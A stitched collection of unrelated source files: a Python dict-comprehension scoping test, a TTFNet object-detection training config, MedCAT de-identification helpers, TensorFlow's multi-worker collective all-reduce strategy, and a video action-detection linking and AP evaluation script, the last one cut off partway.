6: None, 7: None, 8: None, 9: None}
actual = {k: None for k in range(10)}
self.assertEqual(actual, expected)
self.assertEqual(k, "Local Variable")
expected = {9: 1, 18: 2, 19: 2, 27: 3, 28: 3, 29: 3, 36: 4, 37: 4,
38: 4, 39: 4, 45: 5, 46: 5, 47: 5, 48: 5, 49: 5, 54: 6,
55: 6, 56: 6, 57: 6, 58: 6, 59: 6, 63: 7, 64: 7, 65: 7,
66: 7, 67: 7, 68: 7, 69: 7, 72: 8, 73: 8, 74: 8, 75: 8,
76: 8, 77: 8, 78: 8, 79: 8, 81: 9, 82: 9, 83: 9, 84: 9,
85: 9, 86: 9, 87: 9, 88: 9, 89: 9}
actual = {k: v for v in range(10) for k in range(v * 9, v * 10)}
self.assertEqual(k, "Local Variable")
self.assertEqual(actual, expected)
def test_scope_isolation_from_global(self):
expected = {0: None, 1: None, 2: None, 3: None, 4: None, 5: None,
6: None, 7: None, 8: None, 9: None}
actual = {g: None for g in range(10)}
self.assertEqual(actual, expected)
self.assertEqual(g, "Global variable")
expected = {9: 1, 18: 2, 19: 2, 27: 3, 28: 3, 29: 3, 36: 4, 37: 4,
38: 4, 39: 4, 45: 5, 46: 5, 47: 5, 48: 5, 49: 5, 54: 6,
55: 6, 56: 6, 57: 6, 58: 6, 59: 6, 63: 7, 64: 7, 65: 7,
66: 7, 67: 7, 68: 7, 69: 7, 72: 8, 73: 8, 74: 8, 75: 8,
76: 8, 77: 8, 78: 8, 79: 8, 81: 9, 82: 9, 83: 9, 84: 9,
85: 9, 86: 9, 87: 9, 88: 9, 89: 9}
actual = {g: v for v in range(10) for g in range(v * 9, v * 10)}
self.assertEqual(g, "Global variable")
self.assertEqual(actual, expected)
def test_global_visibility(self):
expected = {0: 'Global variable', 1: 'Global variable',
2: 'Global variable', 3: 'Global variable',
4: 'Global variable', 5: 'Global variable',
6: 'Global variable', 7: 'Global variable',
8: 'Global variable', 9: 'Global variable'}
actual = {k: g for k in range(10)}
self.assertEqual(actual, expected)
def test_local_visibility(self):
v = "Local variable"
expected = {0: 'Local variable', 1: 'Local variable',
2: 'Local variable', 3: 'Local variable',
4: 'Local variable', 5: 'Local variable',
6: 'Local variable', 7: 'Local variable',
8: 'Local variable', 9: 'Local variable'}
actual = {k: v for k in range(10)}
self.assertEqual(actual, expected)
self.assertEqual(v, "Local variable")
def test_illegal_assignment(self):
with self.assertRaisesRegexp(SyntaxError, "can't assign"):
compile("{x: y for y, x in ((1, 2), (3, 4))} = 5", "<test>",
"exec")
with self.assertRaisesRegexp(SyntaxError, "can't assign"):
compile("{x: y for y, x in ((1, 2), (3, 4))} += 5", "<test>",
"exec")
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
the-stack_106_19133
|
# model settings
model = dict(
type='TTFNet',
pretrained='modelzoo://resnet18',
backbone=dict(
type='ResNet',
depth=18,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_eval=False,
style='pytorch'),
neck=None,
bbox_head=dict(
type='TTFv2Head',
inplanes=(64, 128, 256, 512),
planes_b1=(128, 64),
planes_b2=(64, 32),
down_ratio_b1=8,
down_ratio_b2=4,
hm_head_channels=128,
wh_head_channels=64,
hm_head_conv_num=2,
wh_head_conv_num=1,
num_classes=81,
wh_scale_factor_b1=16.,
wh_scale_factor_b2=16.,
shortcut_cfg=(1, 2),
alpha=0.54,
beta=0.54,
max_objs=128,
hm_weight_b1=1.,
wh_weight_b1=5.,
hm_weight_b2=0.8,
wh_weight_b2=5.,
inf_branch=['b1', 'b2'],
use_simple_nms=False,
conv_cfg=None,
norm_cfg=dict(type='BN')))
cudnn_benchmark = True
# training and testing settings
train_cfg = dict(debug=False)
test_cfg = dict(score_thr=0.01, max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(512, 512), keep_ratio=False),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(512, 512),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=False),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=16,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='SGD',
lr=0.002,
momentum=0.9,
weight_decay=0.0004,
paramwise_options=dict(bias_lr_mult=2., bias_decay_mult=0.))
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 5,
step=[9, 11])
checkpoint_config = dict(save_every_n_steps=200, max_to_keep=1, keep_every_n_epochs=9)
# yapf:disable
log_config = dict(interval=20)
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ttfv2net_r18_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_106_19135
|
from medcat.utils.data_utils import count_annotations
from medcat.cdb import CDB
def deid_text(cat, text, redact=False):
new_text = str(text)
entities = cat.get_entities(text)['entities']
for ent in sorted(entities.values(), key=lambda ent: ent['start'], reverse=True):
r = "*"*(ent['end']-ent['start']) if redact else cat.cdb.get_name(ent['cui'])
new_text = new_text[:ent['start']] + f'[{r}]' + new_text[ent['end']:]
return new_text
def make_or_update_cdb(json_path, cdb=None, min_count=0):
r''' Creates a new CDB or updates an existing one with new
    concepts if the cdb argument is provided. All concepts that do not occur more
    than min_count times will be ignored.
'''
cui2cnt = count_annotations(json_path)
if cdb is None:
cdb = CDB()
for cui in cui2cnt.keys():
if cui2cnt[cui] > min_count:
# We are adding only what is needed
cdb.cui2names[cui] = set([cui])
cdb.cui2preferred_name[cui] = cui
return cdb
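# --- Usage sketch (illustrative only) ---
# Assumes `cat` is an already-loaded MedCAT model object and that
# 'annotations.json' is an annotation export understood by count_annotations;
# both names are placeholders.
#
# cdb = make_or_update_cdb('annotations.json', min_count=5)
# clean = deid_text(cat, "Patient John Smith attended on 2020-01-01.", redact=True)
# print(clean)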
|
the-stack_106_19136
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class CollectiveAllReduceStrategy implementing DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute import numpy_dataset
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import values
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.cluster_resolver import TFConfigClusterResolver
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import tf_export
# TODO(yuefengz): support in-graph replication.
@tf_export("distribute.experimental.MultiWorkerMirroredStrategy", v1=[])
class CollectiveAllReduceStrategy(distribute_lib.Strategy):
"""Distribution strategy that uses collective ops for all-reduce.
It is similar to MirroredStrategy but it uses collective ops for reduction.
By default it uses all local GPUs or CPU for single-worker training.
When 'TF_CONFIG' environment variable is given, it parses cluster_spec,
task_type and task_id from 'TF_CONFIG' and turns into a multi-worker strategy
  which mirrors models on GPUs of all machines in a cluster. In the current
implementation, it uses all GPUs in a cluster and it assumes all workers have
the same number of GPUs.
It supports both eager mode and graph mode. However, for eager mode, it has to
set up the eager context in its constructor and therefore all ops in eager
mode have to run after the strategy object is created.
Args:
communication: optional Enum of type
`distribute.experimental.CollectiveCommunication`. This provides a way
for the user to override the choice of collective op communication.
Possible values include `AUTO`, `RING`, and `NCCL`.
"""
def __init__(
self,
communication=cross_device_ops_lib.CollectiveCommunication.AUTO):
"""Initializes the object."""
super(CollectiveAllReduceStrategy, self).__init__(
CollectiveAllReduceExtended(
self,
communication=communication))
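# A minimal single-worker usage sketch of the class defined above (illustrative
# only, not part of the original source); `build_model` and `dataset` are
# user-supplied placeholders.
#
#   strategy = CollectiveAllReduceStrategy()
#   with strategy.scope():
#     model = build_model()   # variables are created under the strategy
#   model.compile(optimizer='sgd', loss='mse')
#   model.fit(dataset)
#
# For multi-worker training, each worker sets the TF_CONFIG environment
# variable describing the cluster before the strategy object is created.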
@tf_export(v1=["distribute.experimental.MultiWorkerMirroredStrategy"])
class CollectiveAllReduceStrategyV1(distribute_lib.StrategyV1):
__doc__ = CollectiveAllReduceStrategy.__doc__
def __init__(
self,
communication=cross_device_ops_lib.CollectiveCommunication.AUTO):
"""Initializes the object."""
super(CollectiveAllReduceStrategyV1, self).__init__(
CollectiveAllReduceExtended(
self,
communication=communication))
class CollectiveAllReduceExtended(mirrored_strategy.MirroredExtended):
"""Implementation of CollectiveAllReduceStrategy."""
def __init__(self,
container_strategy,
communication,
cluster_resolver=TFConfigClusterResolver()):
distribute_lib.StrategyExtendedV1.__init__(self, container_strategy)
assert isinstance(
communication,
cross_device_ops_lib.CollectiveCommunication)
self._communication = communication
self._initialize_strategy(cluster_resolver)
assert isinstance(self._get_cross_device_ops(),
cross_device_ops_lib.CollectiveAllReduce)
def _initialize_strategy(self, cluster_resolver):
if cluster_resolver.cluster_spec().as_dict():
self._initialize_multi_worker(cluster_resolver)
else:
self._initialize_local(cluster_resolver)
def _initialize_local(self, cluster_resolver):
"""Initializes the object for local training."""
self._is_chief = True
self._num_workers = 1
# TODO(b/126786766): TFConfigClusterResolver returns wrong number of GPUs in
# some cases.
if isinstance(cluster_resolver, TFConfigClusterResolver):
num_gpus = context.num_gpus()
else:
num_gpus = cluster_resolver.num_accelerators().get("GPU", 0)
if num_gpus:
local_devices = tuple("/device:GPU:%d" % i for i in range(num_gpus))
else:
local_devices = ("/device:CPU:0",)
self._worker_device = device_util.canonicalize("/device:CPU:0")
self._host_input_device = numpy_dataset.SingleDevice(self._worker_device)
self._collective_keys = cross_device_utils.CollectiveKeys()
super(CollectiveAllReduceExtended, self)._initialize_local(local_devices)
# TODO(yuefengz): remove num_gpus_per_worker from CollectiveAllReduce.
self._cross_device_ops = cross_device_ops_lib.CollectiveAllReduce(
num_workers=self._num_workers,
num_gpus_per_worker=num_gpus,
collective_keys=self._collective_keys)
self._cluster_spec = None
self._task_type = None
self._task_id = None
# This is a mark to tell whether we are running with standalone client or
# independent worker. Right now with standalone client, strategy object is
# created as local strategy and then turn into multi-worker strategy via
# configure call.
self._local_or_standalone_client_mode = True
# Save the num_gpus_per_worker and rpc_layer for configure method.
self._num_gpus_per_worker = num_gpus
self._rpc_layer = cluster_resolver.rpc_layer
logging.info("CollectiveAllReduceStrategy with local_devices = %r",
local_devices)
def _initialize_multi_worker(self, cluster_resolver):
"""Initializes the object for multi-worker training."""
# TODO(yuefengz): The `num_gpus` is only for this particular task. It
# assumes all workers have the same number of GPUs. We should remove this
# assumption by querying all tasks for their numbers of GPUs.
# TODO(b/126786766): TFConfigClusterResolver returns wrong number of GPUs in
# some cases.
if isinstance(cluster_resolver, TFConfigClusterResolver):
num_gpus = context.num_gpus()
else:
num_gpus = cluster_resolver.num_accelerators().get("GPU", 0)
cluster_spec = multi_worker_util.normalize_cluster_spec(
cluster_resolver.cluster_spec())
task_type = cluster_resolver.task_type
task_id = cluster_resolver.task_id
if task_type is None or task_id is None:
raise ValueError("When `cluster_spec` is given, you must also specify "
"`task_type` and `task_id`.")
self._num_workers = multi_worker_util.worker_count(cluster_spec, task_type)
if not self._num_workers:
raise ValueError("No `worker`, `chief` or `evaluator` tasks can be found "
"in `cluster_spec`.")
self._is_chief = multi_worker_util.is_chief(cluster_spec, task_type,
task_id)
self._worker_device = "/job:%s/task:%d" % (task_type, task_id)
self._host_input_device = numpy_dataset.SingleDevice(self._worker_device)
if num_gpus:
local_devices = tuple("%s/device:GPU:%d" % (self._worker_device, i)
for i in range(num_gpus))
else:
local_devices = (self._worker_device,)
self._collective_keys = cross_device_utils.CollectiveKeys()
super(CollectiveAllReduceExtended, self)._initialize_local(local_devices)
self._input_workers = input_lib.InputWorkers(
self._device_map, [(self._worker_device, self.worker_devices)])
self._cross_device_ops = cross_device_ops_lib.CollectiveAllReduce(
num_workers=self._num_workers,
num_gpus_per_worker=num_gpus,
collective_keys=self._collective_keys)
# Add a default device so that ops without specified devices will not end up
# on other workers.
self._default_device = "/job:%s/task:%d" % (task_type, task_id)
self._cluster_spec = cluster_spec
self._task_type = task_type
self._task_id = task_id
# Save the num_gpus_per_worker and rpc_layer for configure method.
self._num_gpus_per_worker = num_gpus
self._rpc_layer = cluster_resolver.rpc_layer
logging.info(
"Multi-worker CollectiveAllReduceStrategy with cluster_spec = %r, "
"task_type = %r, task_id = %r, num_workers = %r, local_devices = %r, "
"communication = %s", cluster_spec.as_dict(), task_type,
task_id, self._num_workers, local_devices,
self._communication)
if (context.executing_eagerly() and
not getattr(self, "_std_server_started", False) and
not getattr(self, "_local_or_standalone_client_mode", False)):
# Checking _local_or_standalone_client_mode as well because we should not
# create the std server in standalone client mode.
config_proto = config_pb2.ConfigProto()
config_proto = self._update_config_proto(config_proto)
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_spec.as_cluster_def(),
default_session_config=config_proto,
job_name=task_type,
task_index=task_id,
protocol=cluster_resolver.rpc_layer or "grpc")
context.context().enable_collective_ops(server_def)
self._std_server_started = True
logging.info(
"Enabled multi-worker collective ops with available devices: %r",
context.context().devices())
def _create_variable(self, next_creator, *args, **kwargs):
colocate_with = kwargs.pop("colocate_with", None)
if colocate_with is None:
device_map = self._device_map
logical_device = 0 # TODO(josh11b): Get logical device from scope here.
elif isinstance(colocate_with, numpy_dataset.SingleDevice):
with ops.device(colocate_with.device):
return next_creator(*args, **kwargs)
else:
device_map = colocate_with.device_map
logical_device = colocate_with.logical_device
def _real_mirrored_creator(devices, *args, **kwargs):
"""Creates one MirroredVariable on the current worker."""
unique_var_name = ops.get_default_graph().unique_name(
kwargs["name"], mark_as_used=False).rstrip("/")
# pylint: disable=protected-access
collective_instance_key = self._collective_keys.get_instance_key(
key_id=unique_var_name)
      # Only the first device participates in the broadcast of initial values.
group_key = self._collective_keys.get_group_key([devices[0]])
group_size = self._num_workers
if "initial_value" not in kwargs:
raise ValueError("Initial value must be specified.")
initial_value = kwargs["initial_value"]
if callable(initial_value):
initial_value_fn = initial_value
else:
initial_value_fn = lambda: initial_value
value_list = []
for i, d in enumerate(devices):
with ops.init_scope(), ops.device(d):
if i == 0:
# The initial value fn makes sure variables all initialized to
# same values. The first device of the chief worker will send their
# variable values to other workers.
def _overridden_initial_value_fn(device=d, index=i): # pylint: disable=g-missing-docstring
with ops.device(device):
initial_value = initial_value_fn()
assert not callable(initial_value)
initial_value = ops.convert_to_tensor(initial_value)
assert index == 0, index
if self._num_workers > 1:
if self._is_chief:
bcast_send = collective_ops.broadcast_send(
initial_value, initial_value.shape, initial_value.dtype,
group_size, group_key, collective_instance_key)
with ops.control_dependencies([bcast_send]):
return array_ops.identity(initial_value)
else:
return collective_ops.broadcast_recv(
initial_value.shape, initial_value.dtype, group_size,
group_key, collective_instance_key)
return initial_value
else:
# Give replicas meaningful distinct names:
var0name = value_list[0].name.split(":")[0]
# We append a / to variable names created on replicas with id > 0 to
# ensure that we ignore the name scope and instead use the given
# name as the absolute name of the variable.
kwargs["name"] = "%s/replica_%d/" % (var0name, i)
# Variables on non-first replica get initial values from the
# variables created on the first device of each worker.
def _overridden_initial_value_fn(device=d, index=i):
assert index > 0
with ops.device(device):
if context.executing_eagerly():
return array_ops.identity(value_list[0].value())
else:
return array_ops.identity(value_list[0].initial_value)
kwargs["initial_value"] = _overridden_initial_value_fn
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
# Don't record operations (e.g. other variable reads) during
# variable creation.
with tape.stop_recording():
v = next_creator(*args, **kwargs)
if i == 0:
actual_var_name = v.name.split(":")[0]
assert unique_var_name == actual_var_name, "%r vs %r" % (
unique_var_name, actual_var_name)
assert not isinstance(v, values.DistributedVariable)
value_list.append(v)
return value_list
# pylint: disable=protected-access
return mirrored_strategy._create_mirrored_variable(
self._container_strategy(), device_map, logical_device,
_real_mirrored_creator, *args, **kwargs)
def _make_input_context(self):
if self._cluster_spec is None:
input_pipeline_id = 0
else:
input_pipeline_id = multi_worker_util.id_in_cluster(
self._cluster_spec, self._task_type, self._task_id)
input_context = distribute_lib.InputContext(
num_input_pipelines=self._num_workers,
input_pipeline_id=input_pipeline_id,
num_replicas_in_sync=self._num_replicas_in_sync)
return input_context
def _experimental_distribute_dataset(self, dataset):
input_context = self._make_input_context()
return input_lib.get_distributed_dataset(dataset, self._input_workers,
self._num_replicas_in_sync,
input_context=input_context)
def _make_dataset_iterator(self, dataset):
"""Distributes the dataset to each local GPU."""
input_context = self._make_input_context()
return input_lib.DatasetIterator(dataset, self._input_workers,
self._num_replicas_in_sync,
input_context=input_context)
def _make_input_fn_iterator(
self,
input_fn,
replication_mode=distribute_lib.InputReplicationMode.PER_WORKER):
"""Distributes the input function to each local GPU."""
input_context = self._make_input_context()
return input_lib.InputFunctionIterator(
input_fn, self._input_workers, [input_context])
def _configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
"""Configures the object.
Args:
session_config: a `tf.compat.v1.ConfigProto`
cluster_spec: a dict, ClusterDef or ClusterSpec object specifying the
cluster configurations.
task_type: the current task type, such as "worker".
task_id: the current task id.
Raises:
ValueError: if `task_type` is not in the `cluster_spec`.
"""
if cluster_spec:
# Use the num_gpus_per_worker recorded in constructor since _configure
# doesn't take num_gpus.
cluster_resolver = SimpleClusterResolver(
cluster_spec=multi_worker_util.normalize_cluster_spec(cluster_spec),
task_type=task_type,
task_id=task_id,
num_accelerators={"GPU": self._num_gpus_per_worker},
rpc_layer=self._rpc_layer)
self._initialize_multi_worker(cluster_resolver)
assert isinstance(self._get_cross_device_ops(),
cross_device_ops_lib.CollectiveAllReduce)
if session_config:
session_config.CopyFrom(self._update_config_proto(session_config))
def _update_config_proto(self, config_proto):
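    # Returns a copy of `config_proto` tuned for collective ops: it enables the
    # scoped allocator optimization, turns on NCCL when this worker has GPUs and
    # NCCL communication is selected, and, for multi-worker setups, sets the
    # collective group leader and restricts device filters to this task.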
updated_config = copy.deepcopy(config_proto)
# Enable the scoped allocator optimization for CollectiveOps. This
# optimization converts many small all-reduces into fewer larger
# all-reduces.
rewrite_options = updated_config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
# We turn on ScopedAllocator only for CollectiveReduce op, i.e. enable_op =
# ["CollectiveReduce"]. Since we can't assign to a repeated proto field, we
# clear and then append.
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append("CollectiveReduce")
if ((self._communication ==
cross_device_ops_lib.CollectiveCommunication.NCCL) and
self._num_gpus_per_worker > 0):
updated_config.experimental.collective_nccl = True
if not self._cluster_spec:
return updated_config
assert self._task_type
assert self._task_id is not None
# Collective group leader is needed for collective ops to coordinate
# workers.
updated_config.experimental.collective_group_leader = (
multi_worker_util.collective_leader(self._cluster_spec, self._task_type,
self._task_id))
# The device filters prevent communication between workers.
del updated_config.device_filters[:]
updated_config.device_filters.append(
"/job:%s/task:%d" % (self._task_type, self._task_id))
return updated_config
def _reduce_to(self, reduce_op, value, destinations):
if (isinstance(value, values.Mirrored) and
reduce_op == reduce_util.ReduceOp.MEAN):
return value
assert not isinstance(value, values.Mirrored)
if (isinstance(value, values.DistributedValues) and
len(self.worker_devices) == 1):
value = value.values[0]
# When there are multiple workers, we need to reduce across workers using
# collective ops.
if (not isinstance(value, values.DistributedValues) and
self._num_workers == 1):
      # This function handles reducing values that are not PerReplica or
      # Mirrored values. For example, the same value could be present on all
      # replicas, in which case `value` would be a single value, or `value`
      # could be 0.
return cross_device_ops_lib.reduce_non_distributed_value(
reduce_op, self._device_map, value, destinations)
return self._get_cross_device_ops().reduce(
reduce_op, value, destinations=destinations)
@property
def experimental_between_graph(self):
return True
@property
def experimental_should_init(self):
return True
@property
def should_checkpoint(self):
return self._is_chief
@property
def should_save_summary(self):
return self._is_chief
@property
def _num_replicas_in_sync(self):
return len(self.worker_devices) * self._num_workers
# TODO(priyag): Delete this once all strategies use global batch size.
@property
def _global_batch_size(self):
"""`make_dataset_iterator` and `make_numpy_iterator` use global batch size.
`make_input_fn_iterator` assumes per-replica batching.
Returns:
Boolean.
"""
return True
|
the-stack_106_19137
|
# -*- coding:utf-8 -*-
import numpy as np
import os
from core.utils import *
def compute_score_one_class(bbox1, bbox2, w_iou=1.0, w_scores=1.0, w_scores_mul=0.5):
# bbx: <x1> <y1> <x2> <y2> <class score>
n_bbox1 = bbox1.shape[0]
n_bbox2 = bbox2.shape[0]
# for saving all possible scores between each two bbxes in successive frames
scores = np.zeros([n_bbox1, n_bbox2], dtype=np.float32)
for i in range(n_bbox1):
box1 = bbox1[i, :4]
for j in range(n_bbox2):
box2 = bbox2[j, :4]
bbox_iou_frames = bbox_iou(box1, box2, x1y1x2y2=True)
sum_score_frames = bbox1[i, 4] + bbox2[j, 4]
mul_score_frames = bbox1[i, 4] * bbox2[j, 4]
scores[i, j] = w_iou * bbox_iou_frames + w_scores * sum_score_frames + w_scores_mul * mul_score_frames
return scores
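# Illustrative note (not in the original source): with the default weights the
# linking score rewards both spatial overlap and detection confidence, e.g. two
# boxes with IoU 0.8 and class scores 0.9 / 0.7 give
# 1.0 * 0.8 + 1.0 * (0.9 + 0.7) + 0.5 * (0.9 * 0.7) = 2.715.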
def link_bbxes_between_frames(bbox_list, w_iou=1.0, w_scores=1.0, w_scores_mul=0.5):
# bbx_list: list of bounding boxes <x1> <y1> <x2> <y2> <class score>
# check no empty detections
ind_notempty = []
nfr = len(bbox_list)
for i in range(nfr):
if np.array(bbox_list[i]).size:
ind_notempty.append(i)
# no detections at all
if not ind_notempty:
return []
    # some frames are missing detections
elif len(ind_notempty)!=nfr:
for i in range(nfr):
if not np.array(bbox_list[i]).size:
# copy the nearest detections to fill in the missing frames
ind_dis = np.abs(np.array(ind_notempty) - i)
nn = np.argmin(ind_dis)
bbox_list[i] = bbox_list[ind_notempty[nn]]
detect = bbox_list
nframes = len(detect)
res = []
    isempty_vertex = np.zeros([nframes,], dtype=bool)  # plain bool: np.bool was removed from recent NumPy releases
edge_scores = [compute_score_one_class(detect[i], detect[i+1], w_iou=w_iou, w_scores=w_scores, w_scores_mul=w_scores_mul) for i in range(nframes-1)]
    copy_edge_scores = edge_scores  # note: this binds the same list object, not an independent copy
while not np.any(isempty_vertex):
# initialize
scores = [np.zeros([d.shape[0],], dtype=np.float32) for d in detect]
index = [np.nan*np.ones([d.shape[0],], dtype=np.float32) for d in detect]
# viterbi
# from the second last frame back
for i in range(nframes-2, -1, -1):
edge_score = edge_scores[i] + scores[i+1]
# find the maximum score for each bbox in the i-th frame and the corresponding index
scores[i] = np.max(edge_score, axis=1)
index[i] = np.argmax(edge_score, axis=1)
# decode
idx = -np.ones([nframes], dtype=np.int32)
idx[0] = np.argmax(scores[0])
for i in range(0, nframes-1):
idx[i+1] = index[i][idx[i]]
# remove covered boxes and build output structures
this = np.empty((nframes, 6), dtype=np.float32)
this[:, 0] = 1 + np.arange(nframes)
for i in range(nframes):
j = idx[i]
iouscore = 0
if i < nframes-1:
iouscore = copy_edge_scores[i][j, idx[i+1]] - bbox_list[i][j, 4] - bbox_list[i+1][idx[i+1], 4]
if i < nframes-1: edge_scores[i] = np.delete(edge_scores[i], j, 0)
if i > 0: edge_scores[i-1] = np.delete(edge_scores[i-1], j, 1)
this[i, 1:5] = detect[i][j, :4]
this[i, 5] = detect[i][j, 4]
detect[i] = np.delete(detect[i], j, 0)
            isempty_vertex[i] = (detect[i].size==0)  # becomes True once this frame has no remaining detections
res.append( this )
if len(res) == 3:
break
return res
def link_video_one_class(vid_det, bNMS3d = False, gtlen=None):
'''
linking for one class in a video (in full length)
vid_det: a list of [frame_index, [bbox cls_score]]
gtlen: the mean length of gt in training set
return a list of tube [array[frame_index, x1,y1,x2,y2, cls_score]]
'''
# list of bbox information [[bbox in frame 1], [bbox in frame 2], ...]
vdets = [vid_det[i][1] for i in range(len(vid_det))]
vres = link_bbxes_between_frames(vdets)
if len(vres) != 0:
if bNMS3d:
tube = [b[:, :5] for b in vres]
# compute score for each tube
tube_scores = [np.mean(b[:, 5]) for b in vres]
dets = [(tube[t], tube_scores[t]) for t in range(len(tube))]
# nms for tubes
keep = nms_3d(dets, 0.3) # bug for nms3dt
if np.array(keep).size:
vres_keep = [vres[k] for k in keep]
# max subarray with penalization -|Lc-L|/Lc
if gtlen:
vres = temporal_check(vres_keep, gtlen)
else:
vres = vres_keep
return vres
def video_ap_one_class(gt, pred_videos, iou_thresh = 0.2, bTemporal = False, gtlen = None):
'''
gt: [ video_index, array[frame_index, x1,y1,x2,y2] ]
pred_videos: [ video_index, [ [frame_index, [[x1,y1,x2,y2, score]] ] ] ]
'''
# link for prediction
pred = []
for pred_v in pred_videos:
video_index = pred_v[0]
pred_link_v = link_video_one_class(pred_v[1], True, gtlen) # [array<frame_index, x1,y1,x2,y2, cls_score>]
for tube in pred_link_v:
pred.append((video_index, tube))
# sort tubes according to scores (descending order)
argsort_scores = np.argsort(-np.array([np.mean(b[:, 5]) for _, b in pred]))
pr = np.empty((len(pred)+1, 2), dtype=np.float32) # precision, recall
pr[0,0] = 1.0
pr[0,1] = 0.0
fn = len(gt) #sum([len(a[1]) for a in gt])
fp = 0
tp = 0
gt_v_index = [g[0] for g in gt]
for i, k in enumerate(argsort_scores):
# if i % 100 == 0:
# print ("%6.2f%% boxes processed, %d positives found, %d remain" %(100*float(i)/argsort_scores.size, tp, fn))
video_index, boxes = pred[k]
ispositive = False
if video_index in gt_v_index:
gt_this_index, gt_this = [], []
for j, g in enumerate(gt):
if g[0] == video_index:
gt_this.append(g[1])
gt_this_index.append(j)
if len(gt_this) > 0:
if bTemporal:
iou = np.array([iou3dt(np.array(g), boxes[:, :5]) for g in gt_this])
else:
if boxes.shape[0] > gt_this[0].shape[0]:
                        # in case some frames don't have gt
iou = np.array([iou3d(g, boxes[int(g[0,0]-1):int(g[-1,0]),:5]) for g in gt_this])
elif boxes.shape[0]<gt_this[0].shape[0]:
# in flow case
iou = np.array([iou3d(g[int(boxes[0,0]-1):int(boxes[-1,0]),:], boxes[:,:5]) for g in gt_this])
else:
iou = np.array([iou3d(g, boxes[:,:5]) for g in gt_this])
                if iou.size > 0:  # guard against empty/invalid annotations (e.g. on UCF101)
argmax = np.argmax(iou)
if iou[argmax] >= iou_thresh:
ispositive = True
del gt[gt_this_index[argmax]]
if ispositive:
tp += 1
fn -= 1
else:
fp += 1
pr[i+1,0] = float(tp)/float(tp+fp)
pr[i+1,1] = float(tp)/float(tp+fn + 0.00001)
ap = voc_ap(pr)
return ap
def gt_to_videts(gt_v):
# return [label, video_index, [[frame_index, x1,y1,x2,y2], [], []] ]
keys = list(gt_v.keys())
keys.sort()
res = []
for i in range(len(keys)):
# annotation of the video: tubes and gt_classes
v_annot = gt_v[keys[i]]
for j in range(len(v_annot['tubes'])):
res.append([v_annot['gt_classes'], i+1, v_annot['tubes'][j]])
return res
def evaluate_videoAP(gt_videos, all_boxes, CLASSES, iou_thresh = 0.2, bTemporal = False, prior_length = None):
'''
gt_videos: {vname:{tubes: [[frame_index, x1,y1,x2,y2]], gt_classes: vlabel}}
all_boxes: {imgname:{cls_ind:array[x1,y1,x2,y2, cls_score]}}
'''
def imagebox_to_videts(img_boxes, CLASSES):
# image names
keys = list(all_boxes.keys())
keys.sort()
res = []
# without 'background'
for cls_ind, cls in enumerate(CLASSES[0:]):
v_cnt = 1
frame_index = 1
v_dets = []
cls_ind += 1
# get the directory path of images
preVideo = os.path.dirname(keys[0])
for i in range(len(keys)):
curVideo = os.path.dirname(keys[i])
img_cls_dets = img_boxes[keys[i]][cls_ind]
v_dets.append([frame_index, img_cls_dets])
frame_index += 1
if preVideo!=curVideo:
preVideo = curVideo
frame_index = 1
